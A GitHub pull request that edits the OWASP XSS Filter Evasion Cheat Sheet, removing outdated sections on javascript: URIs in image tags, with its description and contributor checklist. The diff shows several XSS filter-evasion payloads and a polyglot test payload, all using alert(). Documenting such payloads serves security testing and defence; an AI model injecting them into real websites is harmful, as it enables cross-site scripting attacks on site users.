### PR TITLE
Update XSS_Filter_Evasion_Cheat_Sheet.md

### DIFF
--- a/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md
+++ b/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md
@@ -20,34 +20,6 @@ The following is a "polygot test XSS payload." This test will execute in multipl
 
 `javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>`
 
-### Image XSS Using the JavaScript Directive
-
-Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well:
-
-`<IMG SRC="javascript:alert('XSS');">`
-
-### No Quotes and no Semicolon
-
-`<IMG SRC=javascript:alert('XSS')>`
-
-### Case Insensitive XSS Attack Vector
-
-`<IMG SRC=JaVaScRiPt:alert('XSS')>`
-
-### HTML Entities
-
-The semicolons are required for this to work:
-
-`<IMG SRC=javascript:alert(&quot;XSS&quot;)>`
-
-### Grave Accent Obfuscation
-
-If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents:
-
-```
-<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
-```
-
 ### Malformed A Tags
 
 Skip the HREF attribute and get to the meat of the XXS... Submitted by David Cross \~ Verified on Chrome


### PR DESCRIPTION
Removed section on javascript directive on img src attribute. This is old and outdated. Tested on chrome, firefox and safari.

Thank you for submitting a Pull Request (PR) to the Cheat Sheet Series. 

> :triangular_flag_on_post: If your PR is related to grammar/typo mistakes, please double-check the file for other mistakes in order to fix all the issues in the current cheat sheet.

Please make sure that for your contribution:

- [ ] In case of a new Cheat Sheet, you have used the [Cheat Sheet template](https://github.com/OWASP/CheatSheetSeries/blob/master/templates/New_CheatSheet.md).
- [ ] All the markdown files do not raise any validation policy violation, see the [policy](https://github.com/OWASP/CheatSheetSeries/actions?query=workflow%3A%22Markdown+Link+Check%22).
- [ ] All the markdown files follow these [format rules](https://github.com/OWASP/CheatSheetSeries/blob/master/CONTRIBUTING.md#markdown).
- [ ] All your assets are stored in the **assets** folder.
- [ ] All the images used are in the **PNG** format.
- [ ] Any references to websites have been formatted as [TEXT](URL)
- [ ] You verified/tested the effectiveness of your contribution (e.g., the defensive code proposed is really an effective remediation? Please verify it works!).
- [ ] The CI build of your PR pass, see the build status [here](https://github.com/OWASP/CheatSheetSeries/actions).

If your PR is related to an issue, please finish your PR text with the following line:

This PR covers issue #<insert number here>.

Thank you again for your contribution :smiley:
